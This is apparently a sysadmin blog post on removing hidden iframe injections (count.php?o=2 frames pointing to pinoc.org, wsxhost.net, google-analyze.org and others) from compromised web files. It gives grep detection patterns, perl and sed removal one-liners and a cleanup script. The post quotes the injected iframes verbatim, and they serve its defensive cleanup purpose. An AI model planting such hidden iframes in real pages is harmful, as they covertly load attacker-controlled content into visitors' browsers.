You'll find something like this:
<iframe src="http://wsxhost.net/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
<iframe src="http://wsxhost.net/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
Or:
<iframe src="http://pinoc.org/count.php?o=2" </iframe>
<iframe src="http://pinoc.info/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
<iframe src="http://pinoc.org/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
<iframe src="http://pinoc.org/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
Or:
<iframe src="http://google-analyze.org/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
<iframe src="http://yahoo-analytics.net/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
<iframe src="http://google-analyze.org/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
<iframe src="http://msn-analytics.net/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
Here's a handy perl one-liner for the pinoc domains (courtesy of http://blog.floogy.com/2008/08/fix-pinocorg-and-pinocinfo.html thanks!):
find /PATH/TO/START/FROM/ -type f -print0 | xargs -0 perl -pi -e 's/\<iframe src\=\"http\:\/\/pinoc\.info\/count\.php\?o\=2\" width\=0 height\=0 style\=\"hidden\" frameborder\=0 marginheight\=0 marginwidth\=0 scrolling\=no\>\<\/iframe\>\<iframe src\=\"http\:\/\/pinoc\.org\/count\.php\?o\=2\" width\=0 height\=0 style\=\"hidden\" frameborder\=0 marginheight\=0 marginwidth\=0 scrolling\=no\>\<\/iframe\>//g'
To remove using sed instead:
First we make a grep string that catches all of the iframe. I like egrep:
From:
<iframe src="http://google-analyze.org/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
To:
grep -HRE "<iframe src=\"http:\/\/google-analyze\.org\/count\.php\?o=2\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no><\/iframe>"
Note that the only difference between the strings is the domain they access. All of the files and options are the same. We use this to clean everything at once.
grep -HRE "<iframe src=\"http:\/\/.*\/count\.php\?o=2\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no><\/iframe>" /home/user/*
This should find ALL of the injections. Be sure to redirect the output to a text file for later. The option -lRE should make grep spit out just the names of files. Now we build our sed-line, matching the domain with [^\"]* instead of .* so that two injections on one line can't take the content between them along:
sed "s/<iframe src=\"http:\/\/[^\"]*\/count\.php?o=2\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no><\/iframe>//g"
And attach it to our list (you DID make a list of filenames by using -lRE for grep and redirecting the output, right?):
cat ~/thelist.txt | xargs sed "s/<iframe src=\"http:\/\/[^\"]*\/count\.php?o=2\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no><\/iframe>//g"
This will output thelist.txt into xargs. Xargs will run the sed-line on every file in thelist.txt. Be sure to fix any paths with spaces or sed will break. Note that sed without -i only prints the cleaned text to stdout; the files themselves change once -i is added. If we're lucky, this should result in a clean home directory for your client :). If we aren't, well, hope you backed them up first! We can do this by adding -i.ext to the sed command:
cat ~/thelist.txt | xargs sed -i.shanbak "s/<iframe src=\"http:\/\/[^\"]*\/count\.php?o=2\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no><\/iframe>//g"
I use shanbak in case the client has other .bak files. This makes cleaning up the backups after you've verified the iframes are gone a piece of cake and less hazardous to your client backups.
ich1 out.
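The same find, back up, remove, verify sequence as one script, added here as an example and not part of the original post. It assumes GNU grep, sed and xargs; the function names are hypothetical, and the verification step skips the .shanbak backups because they still contain the iframe.

```shell
#!/bin/sh
# Added example: NUL-safe cleanup of the count.php?o=2 iframe injection.
# Function names are hypothetical; assumes GNU grep, sed and xargs.

# BRE for one injected iframe. [^"]* keeps the match inside a single src
# attribute, so two injections on one line cannot swallow the text between.
# In a BRE the ? is a literal question mark, so it needs no escaping.
INJ='<iframe src="http://[^"]*/count\.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>'

# Print infected files under $1, NUL-terminated so paths with spaces survive.
# Backups are excluded so a second run never rewrites them.
list_infected() {
    grep -rlZ --exclude='*.shanbak' -e "$INJ" "$1"
}

# Print how many non-backup files under $1 still carry the injection.
# grep exits 1 when nothing matches; "|| true" keeps that from being an error.
count_infected() {
    { grep -rl --exclude='*.shanbak' -e "$INJ" "$1" || true; } | wc -l | tr -d ' '
}

# Strip the injection in place, leaving FILE.shanbak beside each changed file.
# xargs -r does nothing when the list is empty.
clean_tree() {
    list_infected "$1" | xargs -0 -r sed -i.shanbak "s|$INJ||g"
}

# When run as a script with one argument: clean that tree and report.
if [ "$#" -eq 1 ]; then
    clean_tree "$1"
    echo "files still infected: $(count_infected "$1")"
fi
```

Once the count is 0 and the pages look right, the backups can be removed with find /home/user -name '*.shanbak' -delete.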